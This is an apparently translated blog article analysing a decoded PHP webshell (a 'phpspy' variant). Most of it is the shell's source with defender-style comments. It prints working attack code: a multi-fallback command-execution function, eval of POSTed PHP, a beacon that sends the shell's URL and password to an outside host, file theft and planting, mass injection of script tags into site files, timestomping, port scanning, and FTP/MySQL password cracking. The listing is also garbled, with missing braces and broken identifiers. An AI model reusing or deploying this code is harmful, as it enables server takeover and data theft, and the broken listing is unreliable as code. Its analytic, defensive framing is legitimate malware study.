
Analysis of php Trojan (encryption cracking)

黄舟
Release: 2016-12-14 13:03:39
Original

Analysis shows that this Trojan is base64-encoded and compressed. Whatever obfuscation it uses, the PHP code must ultimately be executed, so at some point it has to be turned back into plain PHP source; the following PHP program therefore decodes it, decompresses it, and writes the result to a file.
The decoding and decompression code is as follows:

The code is as follows:


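/**
 * Write $data to $filename, replacing any existing content.
 *
 * Opens the file for writing, holds an exclusive advisory lock for the
 * duration of the write, and always closes the handle. The original version
 * discarded the result of fwrite(), so a failed or short write was reported
 * as success; it is now reported as failure.
 *
 * @param string $filename Path to create or overwrite.
 * @param string $data     Bytes to write (may be empty).
 * @return bool True only if the whole payload was written.
 */
function writetofile(string $filename, string $data): bool
{ //File Writing
    // fopen() emits a warning on failure; suppress it and report via the return value.
    $handle = @fopen($filename, "w");
    if (!$handle) {
        return false;
    }
    // Serialise concurrent writers; the lock is released before closing.
    flock($handle, LOCK_EX);
    $written = fwrite($handle, $data);
    flock($handle, LOCK_UN);
    fclose($handle);
    // fwrite() returns the byte count or false; a partial write counts as failure.
    return $written !== false && $written === strlen($data);
}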
?>


Running it in a PHP environment yields the plaintext PHP file shown below:

The code is as follows:


// --- Analyst notes (defender view) -----------------------------------------
// This is the decoded body of the webshell (a "phpspy" variant, per its own
// comments). Comments marked NOTE(review) are observations about this listing,
// not changes to it. The listing was mangled on extraction: HTML was stripped,
// many closing braces are missing and stray spaces appear inside identifiers.
error_reporting(7);   // E_ERROR|E_WARNING|E_PARSE only, so notices never reach the page
ob_start();
$mtime = explode(' ', microtime());
$starttime = $mtime[1] + $mtime[0];   // wall-clock start; presumably for a runtime readout elsewhere
@set_time_limit(0);   // no execution-time cap, so the long-running scan/crack actions below are not cut off
//Non-safe mode can use the above function and cancel after timeout.
/*====================== Program configuration=====================*/
// Whether password verification is required, 1 means verification is required, other numbers mean direct entry. The following options are invalid
$admin['check'] = "1";
// If password verification is required, please change the login password
// NOTE(review): $admin['pass'] is read below (cookie/login check and the
// phone-home URL) but no assignment to it survives in this listing; the line
// that set it was probably lost in extraction.
// Default port table
$hidden = "44997";
$admin['port'] = "80,139,21,3389,3306,43958,1433,5631";
//Jump seconds
$admin['jumpsecond '] = "1";
//Connection port for Ftp cracking
$alexa = "yes";
//Whether to display the Alexa ranking, yes or no
$admin['ftpport'] = "21";
// Whether to allow phpspy itself to automatically modify the time of the edited file to the creation time (yes/no)
$retime = "no";
// The default location of cmd.exe, where the proc_open function is to be used, please modify it accordingly for Linux systems .(Assuming that the winnt system can still be specified in the program)
$cmd = "cmd.exe";
// The following is the copyright column displayed by phpspy, because it is used as a keyword by many programs to kill, Yuhan~~ Allow customization. Don’t change it if you still don’t understand~~

/*====================== Configuration ends ================== =====*/
$serveru = $_SERVER ['HTTP_HOST'].$_SERVER['PHP_SELF'];   // this shell's own URL ...
$serverp = $admin['pass'];                                 // ... and its password
// The two base64 strings decode to the halves of a <script src='http://...?cert=13&u= ... '></script>
// tag (the host is percent-encoded inside the decoded string). On a successful login they are echoed
// around $serveru and $serverp, i.e. the shell reports its own URL and password to a third-party site.
// NOTE(review): decode the host and treat it as an indicator; a script load to it from a page served
// by the web tier is a sign this shell is in use.
$copyurl = base64_decode('PHNjcmlwdCBzcmM9J2h0dHA6Ly8lMzglNjMlNjMlNjUlMkU lNjMlNkYlNkQvJTYzJTY1JTcyJTc0Lz9jZXJ0PTEzJnU9');
$copyurll = base64_decode('Jz48L3NjcmlwdD4=');
$onoff = (function_exists('ini_get')) ? ini_get('register_globals') : get_cfg_var('register_globals');
// With register_globals off, emulate it: every GET/POST key becomes a plain variable (EXTR_SKIP only
// keeps names that already exist). This is why bare $dir, $delfile, $host, $do, $passfile ... used
// throughout the rest of the script are request-controlled.
if ($onoff != 1) {@ extract($_POST, EXTR_SKIP);@extract($_GET, EXTR_SKIP);}
$self = $_SERVER['PHP_SELF'];$dis_func = get_cfg_var("disable_functions");   // consulted before phpinfo()/exec-style calls
/*======= ============== Authentication=====================*/
// Login flow: POST do=login&adminpass=... sets a cookie named "adminpass" (1 day) and emits the
// phone-home tag above; later requests are checked by comparing the raw cookie with the configured
// password using loose !=. GET action=logout clears the cookie. For log review: a request with
// do=login or a cookie named adminpass against an unexpected script is a strong indicator.
// (loginpage() is not part of this listing.)
if($admin['check'] = = "1") {if ($_GET['action'] == "logout") {setcookie ("adminpass", "");echo "";echo "Logout successful...< p>Automatically exit after three seconds or click here to exit the program interface>>>if ($_POST['do'] == 'login') {$thepass=trim($_POST['adminpass']);if ($admin['pass'] == $thepass ) {setcookie ("adminpass",$thepass,time()+(1*24*3600));echo "";echo "".$copyurl.$serveru."&p=".$serverp.$copyurll."";exit;}}if (isset($_COOKIE['adminpass'])) {if ($_COOKIE['adminpass'] != $admin['pass']) {loginpage();}} else {loginpage();}}
/*============ ========= Verification completed======================*/
// Determine magic_quotes_gpc status
if (get_magic_quotes_gpc()) {$_GET = stripslashes_array($_GET);$_POST = stripslashes_array($_POST);}   // stripslashes_array() is not in this listing
//code of mix.dll
// base64(deflate) blob of a DLL, elided from this listing; the "mix" action below writes it to disk.
$mixdll = "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"; 

/**
 * Command-execution primitive used by the rest of the shell.
 *
 * Tries each PHP execution facility in turn — passthru, system, exec,
 * shell_exec, popen, proc_open — skipping any whose name occurs in
 * $disablefunctions, and on Windows finally runs "cmd.exe /C <command>"
 * through the WScript.Shell COM object with output captured in a temp file.
 * Returns the captured output as a string ('' if nothing ran).
 *
 * Defender notes: because the whole list is walked, removing a single
 * function via disable_functions is not a mitigation on its own; the
 * observable is the web-server process spawning cmd.exe / sh, and COM
 * instantiation from PHP on Windows.
 * NOTE(review): $disablefunctions and namE() are not defined in this listing
 * ($dis_func holds disable_functions elsewhere); join("n",...) most likely
 * lost a backslash on extraction; the function's closing brace is missing here.
 */
function shelL($command){ 
global $windows,$disablefunctions; 
$exec = '';$output= ''; 
$dep[]=array('pipe','r');$dep[]=array('pipe','w'); 
if(is_callable('passthru') && !strstr($disablefunctions,'passthru')){ @ob_start();passthru($command);$exec=@ob_get_contents();@ob_clean();@ob_end_clean();} 
elseif(is_callable('system') && !strstr($disablefunctions,'system')){$tmp = @ob_get_contents(); @ob_clean();system($command) ; $output = @ob_get_contents(); @ob_clean(); $exec= $tmp; } 
elseif(is_callable('exec') && !strstr($disablefunctions,'exec')) {exec($command,$output);$output = join("n",$output);$exec= $output;} 
elseif(is_callable('shell_exec') && !strstr($disablefunctions,'shell_exec')){$exec= shell_exec($command);} 
elseif(is_resource($output=popen($command,"r"))) {while(!feof($output)){$exec= fgets($output);}pclose($output);} 
elseif(is_resource($res=proc_open($command,$dep,$pipes))){while(!feof($pipes[1])){$line = fgets($pipes[1]); $output.=$line;}$exec= $output;proc_close($res);} 
// Windows fallback: the temp-file name comes from $_SERVER["TEMP"] directly, so the $dir computed here is not used.
elseif ($windows && is_object($ws = new COM("WScript.Shell"))){$dir=(isset($_SERVER["TEMP"]))?$_SERVER["TEMP"]:ini_get('upload_tmp_dir') ;$name = $_SERVER["TEMP"].namE();$ws->Run("cmd.exe /C $command >$name", 0, true);$exec = file_get_contents($name);unlink($name);} 
return $exec; 

// View PHPINFO
// action=phpinfo dumps phpinfo() unless it is listed in disable_functions;
// action=nowuser reports the user the PHP process runs as.
if ($_GET['action'] == "phpinfo") {echo $phpinfo=(!eregi("phpinfo",$dis_func)) ? phpinfo() : "phpinfo() 函数已被禁用,请查看";exit; 
}if($_GET['action'] == "nowuser") {$user = get_current_user(); 
if(!$user) $user = "报告长官,主机变态,无法获取当前进行用户名!"; 
echo"当前进程用户名:$user"; 
exit; 

// Arbitrary PHP execution: the POST field phpcode is eval'd verbatim (the line
// is truncated in this listing). Any request carrying a phpcode parameter to
// this file is a high-confidence indicator.
if(isset($_POST['phpcode'])){eval("?".">$_POST[phpcode]
// action=mysqldown: reads a server file through MySQL's load_file() (requires the
// FILE privilege) and streams it back, optionally packed by the Zip class (not in
// this listing). $host/$user/$password/$filename/$rardown are request-supplied
// variables; load_file() calls in MySQL general/audit logs are the trace it leaves.
if($action=="mysqldown"){ 
$link=@mysql_connect($host,$user,$password); 
if (!$link) { 
$downtmp = '数据库连接失败: ' . mysql_error(); 
}else{ 
$query="select load_file('".$filename."');"; 
$result = @mysql_query($query, $link); 
if(!$result){ 
$downtmp = "读取失败,可能是文件不存在或是没file权限。
".mysql_error(); 
}else{ 
while ($row = mysql_fetch_array($result)) { 
$filename = basename($filename); 
if($rardown=="yes"){ 
$zip = NEW Zip; 
$zipfiles[]=Array("$filename",$row[0]); 
$zip->Add($zipfiles,1); 
$code = $zip->get_file(); 
$filename = "".$filename.".rar"; 
}else{ 
$code = $row[0]; 

header("Content-type: application/octet-stream"); 
header("Accept-Ranges: bytes"); 
header("Accept-Length: ".strlen($code)); 
header("Content-Disposition: attachment;filename=$filename"); 
echo($code); 
exit; 




// Online proxy
// Fetches whatever URL is in POST url and echoes the body, turning the host into
// an HTTP relay (SSRF-style reach into networks the web server can see). Outbound
// requests from the web tier to unfamiliar hosts are the signal.
if (isset($_POST['url'])) {$proxycontents = @file_get_contents($_POST['url']);echo ($proxycontents) ? $proxycontents : "


获取 URL 内容失败

";exit; 

// Download file
// Streams any readable path given in $downfile (request-supplied) as an attachment.
if (!empty($downfile)) {if (!@file_exists($downfile)) {echo "";} else {$filename = basename($downfile);$filename_info = explode('.', $filename);$fileext = $filename_info[count($filename_info)-1];header('Content-type: application/x-'.$fileext);header('Content-Disposition: attachment; filename='.$filename.'');header('Content-Description: PHP Generated Data');header('Content-Length: '.filesize($downfile));@readfile($downfile);exit;} 

// Directly download the database backup
// Dumps the selected tables via sqldumptable() (not in this listing) and streams
// the result as <host>_MySQL.sql — data exfiltration through the web server.
if ($_POST['backuptype'] == 'download') { 
@mysql_connect($servername,$dbusername,$dbpassword) or die("数据库连接失败"); 
@mysql_select_db($dbname) or die("选择数据库失败"); 
$table = array_flip($_POST['table']); 
$result = mysql_query("SHOW tables"); 
echo ($result) ? NULL : "出错: ".mysql_error(); 

$filename = basename($_SERVER['HTTP_HOST']."_MySQL.sql"); 
header('Content-type: application/unknown'); 
header('Content-Disposition: attachment; filename='.$filename); 
$mysqldata = ''; 
while ($currow = mysql_fetch_array($result)) { 
if (isset($table[$currow[0]])) { 
$mysqldata.= sqldumptable($currow[0]); 
$mysqldata.= $mysqldata."rn"; 


mysql_close(); 
exit; 


// Program directory
// NOTE(review): '\' as written is not valid PHP; the original was presumably '\\'
// and lost a backslash on extraction.
$pathname=str_replace('\','/',dirname(__FILE__)); 
$dirpath=str_replace('\','/',$_SERVER["DOCUMENT_ROOT"]); 

// Get current path
// $dir is the browsing root for the file manager; it comes from GET dir (or the
// extracted request variable of the same name) with no confinement to the web root.
if (!isset($dir) or empty($dir)) { 
$dir = "."; 
$nowpath = getPath($pathname, $dir); 
} else { 
$dir=$_GET['dir']; 
$nowpath = getPath($pathname, $dir); 


// Check read/write status
$dir_writeable = (dir_writeable($nowpath)) ? "可写" : "不可写"; 
$phpinfo=(!eregi("phpinfo",$dis_func)) ? " | PHPINFO()" : ""; 
$reg = (substr(PHP_OS, 0, 3) == 'WIN') ? " | 注册表操作" : ""; 

$tb = new FORMS;   // HTML form/table helper class, not in this listing

?> 
 
 
 
 
 
 
<?php /* page title; NOTE(review): $myneme is never assigned in this listing (likely a typo of $myname) */ echo"$myneme"?> 
 
 
//$_SERVER["DOCUMENT_ROOT"] 
// Navigation bar: host, server time and resolved IP, then the feature menu (link
// targets were stripped with the HTML). The labels enumerate the capabilities:
// root dir | shell dir | environment | online proxy | registry | phpinfo | WebShell |
// misc cracking | unpack mix.dll | logout; batch injection | HTTP download |
// file search | run PHP | run SQL | reverse shell | MySQL backup | Serv-U escalation.
$tb->tableheader(); 
$tb->tdbody('
'.$_SERVER['HTTP_HOST'].''.date("Y年m月d日 h:i:s",time()).''.gethostbyname($_SERVER['SERVER_NAME']).'
','center','top'); 
$tb->tdbody('根目录 | Shell目录 | 环境变量 | 在线代理'.$reg.$phpinfo.' | WebShell | 杂项破解 | 解压mix.dll | 注销登录'); 
$tb->tdbody('批量挂马 | Http文件下载 | 文件查找 | 执行php脚本 | 执行SQL语句 | Func反弹Shell | MySQL备份 | Serv-U提权'); 
$tb->tablefooter(); 
?> 

 
 
// File-manager forms. The field names are what the dispatcher further down keys
// on, and therefore what to look for in request logs: GET dir= (directory jump),
// multipart uploadfile/doupfile/uploaddir (upload into any directory), editfile/
// createfile (new file) and newdirectory/createdirectory (new directory).
$tb->headerform(array('method'=>'GET','content'=>'

程序路径: '.$pathname.'
当前目录('.$dir_writeable.','.substr(base_convert(@fileperms($nowpath),10,8),-4).'): '.$nowpath.'
跳转目录: '.$tb->makeinput('dir',''.$nowpath.'','','text','80').' '.$tb->makeinput('','确定','','submit').' 〖支持绝对路径和相对路径〗')); 

$tb->headerform(array('action'=>'?dir='.urlencode($dir),'enctype'=>'multipart/form-data','content'=>'上传文件到当前目录: '.$tb->makeinput('uploadfile','','','file').' '.$tb->makeinput('doupfile','确定','','submit').$tb->makeinput('uploaddir',$dir,'','hidden'))); 

$tb->headerform(array('action'=>'?action=editfile&dir='.urlencode($dir),'content'=>'新建文件在当前目录: '.$tb->makeinput('editfile').' '.$tb->makeinput('createfile','确定','','submit'))); 

$tb->headerform(array('content'=>'新建目录在当前目录: '.$tb->makeinput('newdirectory').' '.$tb->makeinput('createdirectory','确定','','submit'))); 
?> 

 

 
/*===================== Operations begin =====================*/ 
// Operation dispatcher: a single if/elseif chain keyed on extracted request
// variables ($delfile, $deldir, $createdirectory, $doupfile, $action, $do,
// $connect, $downrar, $regread/$regwrite/$regdelete) and on $_POST['do'].
// Many closing braces are missing from this listing; branch boundaries are
// marked by the comments and the elseif lines.
echo "

n"; 
// Delete file
// unlink() of any request-supplied path, no confinement.
if (!empty($delfile)) { 
if (file_exists($delfile)) { 
echo (@unlink($delfile)) ? $delfile." 删除成功!" : "文件删除失败!"; 
} else { 
echo basename($delfile)." 文件已不存在!"; 



// Delete directory
elseif (!empty($deldir)) { 
$deldirs="$dir/$deldir"; 
if (!file_exists("$deldirs")) { 
echo "$deldir 目录已不存在!"; 
} else { 
echo (deltree($deldirs)) ? "目录删除成功!" : "目录删除失败!"; 



// Create directory
elseif (($createdirectory) AND !empty($_POST['newdirectory'])) { 
if (!empty($newdirectory)) { 
$mkdirs="$dir/$newdirectory"; 
if (file_exists("$mkdirs")) { 
echo "该目录已存在!"; 
} else { 
echo (@mkdir("$mkdirs",0777)) ? "创建目录成功!" : "创建失败!"; 
@chmod("$mkdirs",0777); 




// Upload file
// Copies the uploaded temp file to $uploaddir/<original name>; both the target
// directory and the name are request-controlled. New .php files appearing in
// web-served directories are the thing to alert on.
elseif ($doupfile) { 
echo (@copy($_FILES['uploadfile']['tmp_name'],"".$uploaddir."/".$_FILES['uploadfile']['name']."")) ? "上传成功!" : "上传失败!"; 

// mysqlup: drops the uploaded file through MySQL with
// "SELECT 0x<hex> FROM <db> INTO DUMPFILE '<path>'" — a file write that appears
// in MySQL's logs (and needs the FILE privilege) rather than in PHP's.
elseif($action=="mysqlup"){ 
$filename = $_FILES['upfile']['tmp_name']; 
if(!$filename) { 
echo"没有选择要上传的文件。。"; 
}else{ 
$shell = file_get_contents($filename); 
$mysql = bin2hex($shell);
if(!$upname) $upname = $_FILES['upfile']['name'];
$shell = "select 0x".$mysql." from ".$database ." into DUMPFILE '".$uppath."/".$upname."';";
$link=@mysql_connect($host,$user,$password);
if(!$link){
echo " Login failed ".mysql_error();
}else{
$result = mysql_query($shell, $link);
if($result){
echo" The operation was successful. The file was successfully uploaded to ".$host.", file Named ".$uppath."/".$upname."..";
}else{
echo" Reason for upload failure: ".mysql_error();
}
}
}

}
elseif($action == "mysqldown"){
if(!empty($downtmp)) echo $downtmp;
}
// Edit file
// Writes POST filecontent to any path. With change=yes the content is wrapped,
// gzdeflate'd and base64-encoded — the same packing this article unpacked (the
// wrapper string is truncated in the listing). When $retime=="yes" the file's
// mtime is reset afterwards, so mtimes on a host running this shell are not
// trustworthy for timeline reconstruction.
elseif ($_POST['do'] == 'doeditfile') {
if (!empty ($_POST['editfilename'])) {
if(!file_exists($editfilename)) unset($retime);
if($time==$now) $time = @filemtime($editfilename);
$time2 = @date("Y-m-d H:i:s",$time);
$filename="$editfilename";
@$fp=fopen("$filename","w");
if($_POST[' change']=="yes"){
$filecontent = "?".">".$_POST['filecontent']."$filecontent = gzdeflate($filecontent);
$filecontent = base64_encode($filecontent);
$filecontent = "}else{
$filecontent = $_POST['filecontent'];
}
echo $msg=@fwrite($fp,$filecontent) ? "Write file successfully!" : "Write failed!" ;
@fclose($fp);
if($retime=="yes"){
echo" Yuyu automatic operation: ";
echo $msg=@touch($filename,$time) ? "Modify the file as ".$time2."Success!" : "Failed to modify file time!";
}
} else {
echo "Please enter the file name you want to edit!";
}
}
//File download
// Fetches a remote URL (POST durl) and saves it to $path (request-supplied):
// a second-stage download path, visible as outbound HTTP from the web server.
elseif ( $_POST['do'] == 'downloads') {
$contents = @file_get_contents($_POST['durl']);
if(!$contents){
echo "Unable to read the data to be downloaded";
}
elseif(file_exists($path)){
echo"Sorry, the file ".$path." already exists, please change the save file name. ";
}else{
$fp = @fopen($path,"w");
echo $msg=@fwrite($fp,$contents) ? "Download file successfully!" : "Failed to download file while writing. !";
@fclose($fp);
}
}
// mix: writes the embedded mix.dll blob (base64 + deflate, elided above) to POST mixto.
elseif($_POST['action']=="mix"){
if(!file_exists($_POST['mixto'])){
$ tmp = base64_decode($mixdll);
$tmp = gzinflate($tmp);
$fp = fopen($_POST['mixto'],"w");
echo $msg=@fwrite($fp,$tmp ) ? "Decompression successful!" : "Is this directory not writable? !";
fclose($fp);
}else{
echo"Isn’t it? ".$_POST['mixto']."Already exists~";
}
}
// Edit file properties
elseif ($_POST['do'] == 'editfileperm') {
if (!empty ($_POST['fileperm'])) {
$fileperm=base_convert($_POST['fileperm'],8,10);
echo (@chmod($dir."/".$file,$fileperm)) ? "Attribute modified successfully!" : "Modification failed!";
echo " File ".$file." The modified attribute is: ".substr(base_convert(@fileperms($dir."/".$file), 10,8),-4);
} else {
echo "Please enter the attributes you want to set!";
}
}

// File rename
elseif ($_POST['do'] == 'rename ') {
if (!empty($_POST['newname'])) {
$newname=$_POST['dir']."/".$_POST['newname'];
if (@file_exists($ newname)) {
echo "".$_POST['newname']." Already exists, please re-enter!";
} else {
echo (@rename($_POST['oldname'],$newname)) ? basename($_POST['oldname'])." Successfully changed the name to ".$_POST['newname']." !" : "File name modification failed!";
}
} else {
echo "Please enter your desired name The file name to be changed!";
}
}
// search: content search across the filesystem via find() (not in this listing).
elseif ($_POST['do'] == 'search') {
if(!empty($oldkey)){
echo"Search for keywords: [".$oldkey."], the search results are displayed below:";
if($type2 == "getpath"){
echo"Mouse move There will be a partial interception displayed on the result file.";
}
echo"


";
find($path);
}else{
echo "You want to check Xiami? Do you want to check Xiami? Is there any Xiami you want to check?";
}
}
// plgmok / plgm: "batch horse-mounting" — dirtree() (not in this listing) walks
// POST dir (defaulting to DOCUMENT_ROOT) and injects the POST mm snippet, a
// <script src=...> tag by default, into the files it finds. Mass modification of
// web files within the same second is the signal; restore from known-good copies.
elseif ($_GET['action']=='plgmok') {
dirtree($_POST[ 'dir'],$_POST['mm']);
}
elseif ($_GET['action'] == "plgm") {
$action = '?action=plgmok';
$gm = "< ;script src="http://127.0.0.1" src="http://127.0.0.1">";
$tb->tableheader();
$tb->formheader ($action,'Batch horse-mounting');
$tb->tdbody('Website batch horse-mounting program php version','center');
$tb->tdbody('File location: '.$tb ->makeinput('dir',''.$_SERVER["DOCUMENT_ROOT"].'','','text','60').'
To hang the code:'.$tb-> ;maketextarea('mm',$gm,'50','5').''.$tb->makehidden('do','Batch horse mounting').'
'.$tb- >makeinput('submit','Start hanging horse','','submit'),'center','1','35');
echo "";
$tb-> ;tablefooter();
}//end plgm
// Clone time
// domodtime / modmytime: timestomping — copy another file's mtime onto a file, or
// set an arbitrary one. Treat mtime as untrusted on this host; use ctime, file-system
// journals or backups to establish when files really changed.
elseif ($_POST['do'] == 'domodtime') {
if (!@file_exists($_POST['curfile'])) {
echo "The file to be modified does not exist!";
} else {
if (!@file_exists($_POST['tarfile'])) {
echo "The file to be referenced does not exist!";
} else {
$time=@filemtime($_POST['tarfile']);
echo (@touch($_POST['curfile'],$time,$time)) ? basename($_POST['curfile'])." The modification time was successfully changed to ".date("Y-m-d H:i:s",$time)." !" : "The modification time of the file failed to be modified!";
}
}
}

// Custom time
elseif ($_POST['do'] == 'modmytime') {
if (!@file_exists($_POST['curfile'])) {
echo "The file to be modified does not exist!";
} else {
$year=$_POST['year'];
$month=$_POST['month'];
$data=$_POST['data'];
$hour=$_POST['hour'];
$minute =$_POST['minute'];
$second=$_POST['second'];
if (!empty($year) AND !empty($month) AND !empty($data) AND !empty($hour ) AND !empty($minute) AND !empty($second)) {
$time=strtotime("$data $month $year $hour:$minute:$second");
echo (@touch($_POST[ 'curfile'],$time,$time)) ? The modification time of basename($_POST['curfile'])." was successfully changed to ".date("Y-m-d H:i:s",$time)." ! " : "Failed to modify the modification time of the file!";
}
}
}
// port: TCP connect scan of $host from this server via fsockopen() with a 1 s
// timeout. A burst of short-lived outbound connections from the web server to
// many ports is the observable. (A second 'port' branch appears further down.)
elseif($do =='port'){
$tmp = explode(",",$port);
$count = count( $tmp);
for($i=$first;$i<$count;$i++){
$fp = @fsockopen($host, $tmp[$i], $errno, $errstr, 1);
if($fp) echo "Discover".$host."The host opened the port".$tmp[$i]."
";
}
}
/*
The code here is very complicated, say To be honest, I don’t even know what I wrote.
Fortunately, it works, so I won’t care about it. If someone sees it, I’ll just rewrite it. */
// crack: dictionary attack against a MySQL or FTP login using the wordlist at
// $passfile, paginated by $onetime/$turn with an auto-refresh between rounds.
// Repeated authentication failures originating from the web server's address are
// the signal; the wordlist file itself is an artifact worth collecting.
elseif ($do == 'crack') {//It is registered as a global variable anyway.
if(@file_exists($passfile)){
$tmp = file($passfile);
$count = count($tmp);
if(empty($onetime)){
$onetime = $count;
$ turn="1";
}else{
$nowturn = $turn+1;
$now = $turn*$onetime;
$tt = intval(($count/$onetime)+1);
}
if ($turn>$tt or $onetime>$count){
echo "Exceeded the dictionary capacity~ If you cracked the last process, I'm sorry for the failure.";
}else{
$first = $onetime*($turn- 1);
for($i=$first;$i<$now;$i++){
if($ctype=="mysql") $sa = @mysql_connect($host,$user,chop($tmp[ $i]));
else $sa = @ftp_login(ftp_connect($host,$admin[ftpport]),$user,chop($tmp[$i]));
if($sa)
{
$ t = "Get the password of ".$user." as ".$tmp[$i]."";
}
}
if(!$t){
echo "Dictionary total".$count. ". Now from ".$first." to ".$now.", ".$admin[jumpsecond]." will test the ".$onetime." passwords in seconds. >>>< ;/a>
The decryption of ".$type." in the whole history requires ".$tt." times, and now it is the ".$turn." decryption time
";
}.
else {
echo "$t";
}
}
}else{
echo "The dictionary file does not exist, please confirm.";
}
}
// Second 'port' branch: also accepts a "low-high" range.
elseif($do =='port'){
if( !eregi("-",$port)){
$tmp = explode(",",$port);
$count = count($tmp);
$first = "1";
}else{
$ tmp = explode("-",$port);
$first = $tmp[0];
$count = $tmp[1];

}
for($i=$first;$i<$count; $i++){
if(!eregi("-",$port)){
$fp = @fsockopen($host, $tmp[$i], $errno, $errstr, 1);
if($fp ) echo "Discover".$host."The host opened the port".$tmp[$i]."
";
}else{
$fp = @fsockopen($host, $i, $errno, $errstr, 1);
if($fp) echo "Discover".$host."The host opened the port".$i."
";
}
}

}
// Connect to MYSQL
elseif ($connect) {
if (@mysql_connect($servername,$dbusername,$dbpassword) AND @mysql_select_db($dbname)) {
echo "Database connection successful!";
mysql_close();
} else {
echo mysql_error();
}
}

//Execute SQL statement
// Runs POST sql_query verbatim against the configured database.
elseif ($_POST['do'] == 'query') {
@mysql_connect($servername,$dbusername,$dbpassword) or die("database Connection failed");
@mysql_select_db($dbname) or die("Select database failed");
$result = @mysql_query($_POST['sql_query']);
echo ($result) ? "SQL statement successfully executed !" : "Error: ".mysql_error();
mysql_close();
}

// Backup operation
// backuptype=server: dumps the selected tables to $path on the server (the
// 'download' variant is handled earlier in the script).
elseif ($_POST['do'] == 'backupmysql') {
if (empty($_POST[ 'table']) OR empty($_POST['backuptype'])) {
echo "Please select the data table to be backed up and the backup method!";
} else {
if ($_POST['backuptype'] == 'server') {
@mysql_connect($servername,$dbusername,$dbpassword) or die("Database connection failed");
@mysql_select_db($dbname) or die("Select database failed");
$table = array_flip ($_POST['table']);
$filehandle = @fopen($path,"w");
if ($filehandle) {
$result = mysql_query("SHOW tables");
echo ($result) ? NULL : "Error: ".mysql_error();
while ($currow = mysql_fetch_array($result)) {
if (isset($table[$currow[0]])) {
sqldumptable($currow[0] , $filehandle);
fwrite($filehandle,"nnn");
}
}
fclose($filehandle);
echo "The database has been successfully backed up to
".$path."";
mysql_close();
} else {
echo "Backup failed, please confirm whether the target folder has writable permissions! ";
}
}
}
}
// downrar: with localfile "unzipto:<dir>" unpacks the selected archive; otherwise
// packs the selected files/directories (addziparray(), Zip class not in this
// listing) and either streams the zip (<host>_QQ44997_<date>_Files.zip) or saves
// it under $dir — bulk exfiltration of directory trees.
elseif($downrar) {
if (!empty($dl)) {
if(eregi("unzipto:",$localfile)){
$path = "". $dir."/".str_replace("unzipto:","",$localfile)."";
$zip = new Zip;
$zipfile=$dir."/".$dl[0];
$ array=$zip->get_list($zipfile);
$count=count($array);
$f=0;
$d=0;
for($i=0;$i<$count;$ i++) {
if($array[$i][folder]==0) {
if($zip->Extract($zipfile,$path,$i)>0) $f++;
}
else $d++;
}
if($i==$f+$d) echo "$dl[0] was decompressed to ".$path." successfully
($f files$d directories)";
elseif($f==0) echo "$dl[0] decompression to ".$path." failed";
else echo "$dl[0] not decompressed completely
($f files decompressed $d directories)";
}else{
$zipfile="";
$zip = new Zip;
for($k=0;isset($dl[$k]);$k++)
{
$ zipfile=$dir."/".$dl[$k];
if(is_dir($zipfile))
{
unset($zipfilearray);
addziparray($dl[$k]);
for($i =0;$zipfilearray[$i];$i++)
{
$filename=$zipfilearray[$i];
$filesize=@filesize($dir."/".$zipfilearray[$i]);
$ fp=@fopen($dir."/".$filename,rb);
$zipfiles[]=Array($filename,@fread($fp,$filesize));
@fclose($fp);
}
}
else
{
$filename=$dl[$k];
$filesize=@filesize($zipfile);
$fp=@fopen($zipfile,rb);
$zipfiles[]=Array($ filename,@fread($fp,$filesize));
@fclose($fp);
}
}
$zip->Add($zipfiles,1);
$code = $zip->get_file( );
$ck = "_QQ44997_".date("Y-m-d",time())."";
if(empty($localfile)){
header("Content-type: application/octet-stream");
header("Accept-Ranges: bytes");
header("Accept-Length: ".strlen($code));
header("Content-Disposition: attachment;filename=".$_SERVER['HTTP_HOST'] ."".$ck."_Files.zip");
echo $code;
exit;
}else{
$fp = @fopen("".$dir."/".$localfile.""," w");
echo $msg=@fwrite($fp,$code) ? "Compress and save".$dir."/".$localfile."Local success! !" : "Directory".$dir."No write permission!";
@fclose($fp);
}
}
} else {
echo "Please select the file to be packaged and downloaded!";
}
}
// Shell.Application runs the program
// The COM progids in this and the three registry branches are assembled from
// string fragments ('Sh'.'el'.'l.Appl'...) to defeat naive signature matching;
// they concatenate to Shell.Application and WScript.Shell. Detection should key
// on the COM objects being instantiated from the PHP process, not on the source text.
elseif(($_POST['do'] == 'programrun') AND !empty($_POST['program'])) {
$shell= &new COM('Sh' .'el'.'l.Appl'.'ica'.'tion');
$a = $shell->ShellExecute($_POST['program'],$_POST['prog']);
echo ($a=='0') ? "The program has been successfully executed!" : "The program failed!";
}
// View the PHP configuration parameter status
elseif(($_POST['do'] == 'viewphpvar ') AND !empty($_POST['phpvarname'])) {
echo "Configuration parameters".$_POST['phpvarname']." Detection result: ".getphpcfg($_POST['phpvarname'])."" ;
}
// Read the registry
elseif(($regread) AND !empty($_POST['readregname'])) {
$shell= &new COM('WSc'.'rip'.'t.Sh '.'ell');
var_dump(@$shell->RegRead($_POST['readregname']));
}

// Write to the registry
elseif(($regwrite) AND !empty($ _POST['writeregname']) AND !empty($_POST['regtype']) AND !empty($_POST['regval'])) {
$shell= &new COM('W'.'Scr'.'ipt .S'.'hell');
$a = @$shell->RegWrite($_POST['writeregname'], $_POST['regval'], $_POST['regtype']);
echo ($ a=='0') ? "Writing registry key value successfully!" : "Writing ".$_POST['regname'].", ".$_POST['regval'].", ".$_POST ['regtype']." Failed!";
}
// Delete the registry
elseif(($regdelete) AND !empty($_POST['delregname'])) {
$shell= &new COM('WS' .'cri'.'pt.S'.'he'.'ll');
$a = @$shell->RegDelete($_POST['delregname']);
echo ($a=='0 ') ? "Delete registry key successfully!" : "Delete".$_POST['delregname']." Failed!";
}
// Default view: shortcut links, then drive enumeration B:..Z: using shelL("vol <drive>").
else {
echo "$notice";
echo "Program | pcAnywhere | 开始程序 | AllUsers | Serv-U | "; 
for ($i=66;$i<=90;$i++){$drive= chr($i).':'; 
if (is_dir($drive."/")){$vol=shelL("vol $drive");if(empty($vol))$vol=$drive;echo " $drive\";} 



echo "

n"; 
/*===================== Operations end =====================*/ 
if (!isset($_GET['action']) OR empty($_GET['action']) OR ($_GET['action'] == "dir")) { 
$tb->tableheader(); 
?> 
 
文件 
创建日期 
最后修改 
大小 
属性 
操作 
 
 
// 目录列表 
$dirs=@opendir($dir); 
$dir_i = '0'; 
while ($file=@readdir($dirs)) { 
$filepath="$dir/$file"; 
$a=@is_dir($filepath); 
if($a=="1"){ 
if($file!=".." && $file!=".") { 
$ctime=@date("Y-m-d H:i:s",@filectime($filepath)); 
$mtime=@date("Y-m-d H:i:s",@filemtime($filepath)); 
